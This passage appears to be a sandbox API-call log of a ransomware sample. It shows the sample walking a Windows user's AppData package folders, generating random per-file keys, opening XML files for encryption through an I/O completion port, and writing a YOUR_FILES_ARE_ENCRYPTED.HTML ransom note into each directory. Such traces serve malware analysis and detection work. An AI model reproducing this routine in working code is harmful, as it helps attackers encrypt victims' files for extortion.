lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\*" [0118.838] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7480620a, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x3032309b, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x3032309b, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187a00, dwReserved1=0x6f5ce0, cFileName=".", cAlternateFileName="")) returned 0x626978 [0118.838] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7480620a, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x3032309b, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x3032309b, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187a00, dwReserved1=0x6f5ce0, cFileName="..", cAlternateFileName="")) returned 1 [0118.838] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7480620a, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x3032309b, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x3032309b, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187a00, dwReserved1=0x6f5ce0, cFileName="..", cAlternateFileName="")) returned 0 [0118.838] FindClose (in: hFindFile=0x626978 | out: hFindFile=0x626978) returned 1 [0118.838] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 157 [0118.838] GetProcessHeap () returned 0x600000 [0118.838] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0118.839] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\stagedassets\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0118.839] WriteFile (in: hFile=0x32c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0118.840] CloseHandle (hObject=0x32c) returned 1 [0118.840] GetProcessHeap () returned 0x600000 [0118.840] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0118.840] GetProcessHeap () returned 0x600000 [0118.840] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0118.840] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x11fc5e23, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x13c38283, ftLastAccessTime.dwHighDateTime=0x1d7046d, ftLastWriteTime.dwLowDateTime=0x13c38283, ftLastWriteTime.dwHighDateTime=0x1d7046d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f5da8, dwReserved1=0x6f5cd8, cFileName="Tips", cAlternateFileName="")) returned 1 [0118.840] StrStrIW (lpFirst="Tips", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.840] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips") returned 119 [0118.840] GetProcessHeap () returned 0x600000 [0118.840] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0118.840] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips" [0118.840] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\*" [0118.840] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x11fc5e23, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x13c38283, ftLastAccessTime.dwHighDateTime=0x1d7046d, ftLastWriteTime.dwLowDateTime=0x13c38283, ftLastWriteTime.dwHighDateTime=0x1d7046d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187a00, dwReserved1=0x6f5ce0, cFileName=".", cAlternateFileName="")) returned 0x626778 [0118.840] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x11fc5e23, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x13c38283, ftLastAccessTime.dwHighDateTime=0x1d7046d, ftLastWriteTime.dwLowDateTime=0x13c38283, ftLastWriteTime.dwHighDateTime=0x1d7046d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187a00, dwReserved1=0x6f5ce0, cFileName="..", cAlternateFileName="")) returned 1 [0118.840] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13b2d0b9, ftCreationTime.dwHighDateTime=0x1d7046d, ftLastAccessTime.dwLowDateTime=0x13b2d0b9, ftLastAccessTime.dwHighDateTime=0x1d7046d, ftLastWriteTime.dwLowDateTime=0x189de896, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x5c2b, dwReserved0=0x3187a00, dwReserved1=0x6f5ce0, cFileName="e9d21752-8fc9-4793-b42e-33105b078a51_show.xml", cAlternateFileName="E9D217~1.XML")) returned 1 [0118.841] StrStrIW (lpFirst="e9d21752-8fc9-4793-b42e-33105b078a51_show.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.841] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\e9d21752-8fc9-4793-b42e-33105b078a51_show.xml") returned 165 [0118.841] PathFindExtensionW (pszPath="e9d21752-8fc9-4793-b42e-33105b078a51_show.xml") returned=".xml" [0118.841] lstrlenW (lpString=".xml") returned 4 [0118.841] PathFindExtensionW (pszPath="e9d21752-8fc9-4793-b42e-33105b078a51_show.xml") returned=".xml" [0118.841] SystemFunction036 (in: RandomBuffer=0x19de58, RandomBufferLength=0x20 | out: RandomBuffer=0x19de58) returned 1 [0118.841] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\e9d21752-8fc9-4793-b42e-33105b078a51_show.xml" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\tips\\e9d21752-8fc9-4793-b42e-33105b078a51_show.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x320 [0118.841] GetFileSizeEx (in: hFile=0x320, lpFileSize=0x19de7c | out: lpFileSize=0x19de7c*=23595) returned 1 [0118.841] GetProcessHeap () returned 0x600000 [0118.841] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x670340 [0118.844] wsprintfW (in: param_1=0x19dd96, param_2="%02X" | out: param_1="B5") returned 2 [0118.844] wsprintfW (in: param_1=0x19dd9a, param_2="%02X" | out: param_1="E9") returned 2 [0118.844] wsprintfW (in: param_1=0x19dd9e, param_2="%02X" | out: param_1="D5") returned 2 [0118.844] wsprintfW (in: param_1=0x19dda2, param_2="%02X" | out: param_1="D1") returned 2 [0118.844] wsprintfW (in: param_1=0x19dda6, param_2="%02X" | out: param_1="6C") returned 2 [0118.844] wsprintfW (in: param_1=0x19ddaa, param_2="%02X" | out: param_1="8F") returned 2 [0118.844] wsprintfW (in: param_1=0x19ddae, param_2="%02X" | out: param_1="E1") returned 2 [0118.844] wsprintfW (in: param_1=0x19ddb2, param_2="%02X" | out: param_1="2D") returned 2 [0118.844] wsprintfW (in: param_1=0x19ddb6, param_2="%02X" | out: param_1="29") returned 2 [0118.844] wsprintfW (in: param_1=0x19ddba, param_2="%02X" | out: param_1="E9") returned 2 [0118.844] wsprintfW (in: param_1=0x19ddbe, param_2="%02X" | out: param_1="06") returned 2 [0118.844] wsprintfW (in: param_1=0x19ddc2, param_2="%02X" | out: param_1="E9") returned 2 [0118.844] wsprintfW (in: param_1=0x19ddc6, param_2="%02X" | out: param_1="52") returned 2 [0118.844] wsprintfW (in: param_1=0x19ddca, param_2="%02X" | out: param_1="D2") returned 2 [0118.844] wsprintfW (in: param_1=0x19ddce, param_2="%02X" | out: param_1="5E") returned 2 [0118.844] wsprintfW (in: param_1=0x19ddd2, param_2="%02X" | out: param_1="21") returned 2 [0118.844] wsprintfW (in: param_1=0x19ddd6, param_2="%02X" | out: param_1="3A") returned 2 [0118.844] wsprintfW (in: param_1=0x19ddda, param_2="%02X" | out: param_1="CC") returned 2 [0118.844] wsprintfW (in: param_1=0x19ddde, param_2="%02X" | out: param_1="57") returned 2 [0118.844] wsprintfW (in: param_1=0x19dde2, param_2="%02X" | out: param_1="97") returned 2 [0118.844] wsprintfW (in: param_1=0x19dde6, param_2="%02X" | out: param_1="EE") returned 2 [0118.844] wsprintfW (in: param_1=0x19ddea, param_2="%02X" | out: param_1="43") returned 2 [0118.844] wsprintfW (in: param_1=0x19ddee, param_2="%02X" | out: param_1="C9") returned 2 [0118.844] wsprintfW (in: param_1=0x19ddf2, param_2="%02X" | out: param_1="19") returned 2 [0118.844] wsprintfW (in: param_1=0x19ddf6, param_2="%02X" | out: param_1="4E") returned 2 [0118.844] wsprintfW (in: param_1=0x19ddfa, param_2="%02X" | out: param_1="0A") returned 2 [0118.844] wsprintfW (in: param_1=0x19ddfe, param_2="%02X" | out: param_1="9F") returned 2 [0118.844] wsprintfW (in: param_1=0x19de02, param_2="%02X" | out: param_1="8D") returned 2 [0118.844] wsprintfW (in: param_1=0x19de06, param_2="%02X" | out: param_1="DC") returned 2 [0118.844] wsprintfW (in: param_1=0x19de0a, param_2="%02X" | out: param_1="1F") returned 2 [0118.844] wsprintfW (in: param_1=0x19de0e, param_2="%02X" | out: param_1="49") returned 2 [0118.844] wsprintfW (in: param_1=0x19de12, param_2="%02X" | out: param_1="4B") returned 2 [0118.845] lstrcpyW (in: lpString1=0x6803f4, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\e9d21752-8fc9-4793-b42e-33105b078a51_show.xml" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\e9d21752-8fc9-4793-b42e-33105b078a51_show.xml") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\e9d21752-8fc9-4793-b42e-33105b078a51_show.xml" [0118.845] CreateIoCompletionPort (FileHandle=0x320, ExistingCompletionPort=0x274, CompletionKey=0x670340, NumberOfConcurrentThreads=0x0) returned 0x274 [0118.845] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x670340, lpOverlapped=0x670340) returned 1 [0118.845] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13c38283, ftCreationTime.dwHighDateTime=0x1d7046d, ftLastAccessTime.dwLowDateTime=0x13c38283, ftLastAccessTime.dwHighDateTime=0x1d7046d, ftLastWriteTime.dwLowDateTime=0x189de896, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x4293, dwReserved0=0x3187a00, dwReserved1=0x6f5ce0, cFileName="e9d21752-8fc9-4793-b42e-33105b078a51_withdraw.xml", cAlternateFileName="E9D217~2.XML")) returned 1 [0118.845] StrStrIW (lpFirst="e9d21752-8fc9-4793-b42e-33105b078a51_withdraw.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.845] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\e9d21752-8fc9-4793-b42e-33105b078a51_withdraw.xml") returned 169 [0118.845] PathFindExtensionW (pszPath="e9d21752-8fc9-4793-b42e-33105b078a51_withdraw.xml") returned=".xml" [0118.845] lstrlenW (lpString=".xml") returned 4 [0118.845] PathFindExtensionW (pszPath="e9d21752-8fc9-4793-b42e-33105b078a51_withdraw.xml") returned=".xml" [0118.845] SystemFunction036 (in: RandomBuffer=0x19de58, RandomBufferLength=0x20 | out: RandomBuffer=0x19de58) returned 1 [0118.845] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\e9d21752-8fc9-4793-b42e-33105b078a51_withdraw.xml" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\tips\\e9d21752-8fc9-4793-b42e-33105b078a51_withdraw.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x214 [0118.846] GetFileSizeEx (in: hFile=0x214, lpFileSize=0x19de7c | out: lpFileSize=0x19de7c*=17043) returned 1 [0118.846] GetProcessHeap () returned 0x600000 [0118.846] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30a0048 [0118.848] wsprintfW (in: param_1=0x19dd96, param_2="%02X" | out: param_1="24") returned 2 [0118.848] wsprintfW (in: param_1=0x19dd9a, param_2="%02X" | out: param_1="83") returned 2 [0118.848] wsprintfW (in: param_1=0x19dd9e, param_2="%02X" | out: param_1="47") returned 2 [0118.848] wsprintfW (in: param_1=0x19dda2, param_2="%02X" | out: param_1="B4") returned 2 [0118.848] wsprintfW (in: param_1=0x19dda6, param_2="%02X" | out: param_1="0F") returned 2 [0118.848] wsprintfW (in: param_1=0x19ddaa, param_2="%02X" | out: param_1="B6") returned 2 [0118.848] wsprintfW (in: param_1=0x19ddae, param_2="%02X" | out: param_1="88") returned 2 [0118.848] wsprintfW (in: param_1=0x19ddb2, param_2="%02X" | out: param_1="86") returned 2 [0118.848] wsprintfW (in: param_1=0x19ddb6, param_2="%02X" | out: param_1="93") returned 2 [0118.848] wsprintfW (in: param_1=0x19ddba, param_2="%02X" | out: param_1="86") returned 2 [0118.848] wsprintfW (in: param_1=0x19ddbe, param_2="%02X" | out: param_1="AB") returned 2 [0118.848] wsprintfW (in: param_1=0x19ddc2, param_2="%02X" | out: param_1="28") returned 2 [0118.848] wsprintfW (in: param_1=0x19ddc6, param_2="%02X" | out: param_1="D7") returned 2 [0118.848] wsprintfW (in: param_1=0x19ddca, param_2="%02X" | out: param_1="88") returned 2 [0118.848] wsprintfW (in: param_1=0x19ddce, param_2="%02X" | out: param_1="C5") returned 2 [0118.848] wsprintfW (in: param_1=0x19ddd2, param_2="%02X" | out: param_1="F8") returned 2 [0118.849] wsprintfW (in: param_1=0x19ddd6, param_2="%02X" | out: param_1="A7") returned 2 [0118.849] wsprintfW (in: param_1=0x19ddda, param_2="%02X" | out: param_1="DA") returned 2 [0118.849] wsprintfW (in: param_1=0x19ddde, param_2="%02X" | out: param_1="3C") returned 2 [0118.849] wsprintfW (in: param_1=0x19dde2, param_2="%02X" | out: param_1="41") returned 2 [0118.849] wsprintfW (in: param_1=0x19dde6, param_2="%02X" | out: param_1="96") returned 2 [0118.849] wsprintfW (in: param_1=0x19ddea, param_2="%02X" | out: param_1="87") returned 2 [0118.849] wsprintfW (in: param_1=0x19ddee, param_2="%02X" | out: param_1="51") returned 2 [0118.849] wsprintfW (in: param_1=0x19ddf2, param_2="%02X" | out: param_1="AA") returned 2 [0118.849] wsprintfW (in: param_1=0x19ddf6, param_2="%02X" | out: param_1="09") returned 2 [0118.849] wsprintfW (in: param_1=0x19ddfa, param_2="%02X" | out: param_1="38") returned 2 [0118.849] wsprintfW (in: param_1=0x19ddfe, param_2="%02X" | out: param_1="F6") returned 2 [0118.849] wsprintfW (in: param_1=0x19de02, param_2="%02X" | out: param_1="1D") returned 2 [0118.849] wsprintfW (in: param_1=0x19de06, param_2="%02X" | out: param_1="11") returned 2 [0118.849] wsprintfW (in: param_1=0x19de0a, param_2="%02X" | out: param_1="9D") returned 2 [0118.849] wsprintfW (in: param_1=0x19de0e, param_2="%02X" | out: param_1="98") returned 2 [0118.849] wsprintfW (in: param_1=0x19de12, param_2="%02X" | out: param_1="3B") returned 2 [0118.849] lstrcpyW (in: lpString1=0x30b00fc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\e9d21752-8fc9-4793-b42e-33105b078a51_withdraw.xml" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\e9d21752-8fc9-4793-b42e-33105b078a51_withdraw.xml") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\e9d21752-8fc9-4793-b42e-33105b078a51_withdraw.xml" [0118.849] CreateIoCompletionPort (FileHandle=0x214, ExistingCompletionPort=0x274, CompletionKey=0x30a0048, NumberOfConcurrentThreads=0x0) returned 0x274 [0118.850] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30a0048, lpOverlapped=0x30a0048) returned 1 [0118.850] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13c38283, ftCreationTime.dwHighDateTime=0x1d7046d, ftLastAccessTime.dwLowDateTime=0x13c38283, ftLastAccessTime.dwHighDateTime=0x1d7046d, ftLastWriteTime.dwLowDateTime=0x189de896, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x4293, dwReserved0=0x3187a00, dwReserved1=0x6f5ce0, cFileName="e9d21752-8fc9-4793-b42e-33105b078a51_withdraw.xml", cAlternateFileName="E9D217~2.XML")) returned 0 [0118.850] FindClose (in: hFindFile=0x626778 | out: hFindFile=0x626778) returned 1 [0118.850] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 149 [0118.850] GetProcessHeap () returned 0x600000 [0118.850] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0118.850] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Tips\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\tips\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0118.852] WriteFile (in: hFile=0x32c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0118.853] CloseHandle (hObject=0x32c) returned 1 [0118.853] GetProcessHeap () returned 0x600000 [0118.853] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0118.853] GetProcessHeap () returned 0x600000 [0118.853] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0118.853] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x11fc5e23, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x13c38283, ftLastAccessTime.dwHighDateTime=0x1d7046d, ftLastWriteTime.dwLowDateTime=0x13c38283, ftLastWriteTime.dwHighDateTime=0x1d7046d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f5da8, dwReserved1=0x6f5cd8, cFileName="Tips", cAlternateFileName="")) returned 0 [0118.853] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0118.853] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 144 [0118.853] GetProcessHeap () returned 0x600000 [0118.854] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0118.854] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0118.854] WriteFile (in: hFile=0x324, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0118.855] CloseHandle (hObject=0x324) returned 1 [0118.856] GetProcessHeap () returned 0x600000 [0118.856] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0118.856] GetProcessHeap () returned 0x600000 [0118.856] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0118.869] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a9bfe3d, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x8a9bfe3d, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x8a9bfe3d, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="Microsoft.Windows.ContentDeliveryManager_10.0.10586.0_neutral_neutral_cw5n1h2txyewy", cAlternateFileName="MICROS~1.0_N")) returned 1 [0118.869] StrStrIW (lpFirst="Microsoft.Windows.ContentDeliveryManager_10.0.10586.0_neutral_neutral_cw5n1h2txyewy", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.869] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\Microsoft.Windows.ContentDeliveryManager_10.0.10586.0_neutral_neutral_cw5n1h2txyewy") returned 187 [0118.869] GetProcessHeap () returned 0x600000 [0118.869] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0118.870] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\Microsoft.Windows.ContentDeliveryManager_10.0.10586.0_neutral_neutral_cw5n1h2txyewy" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\Microsoft.Windows.ContentDeliveryManager_10.0.10586.0_neutral_neutral_cw5n1h2txyewy") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\Microsoft.Windows.ContentDeliveryManager_10.0.10586.0_neutral_neutral_cw5n1h2txyewy" [0118.870] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\Microsoft.Windows.ContentDeliveryManager_10.0.10586.0_neutral_neutral_cw5n1h2txyewy", lpString2="\\*" | out: 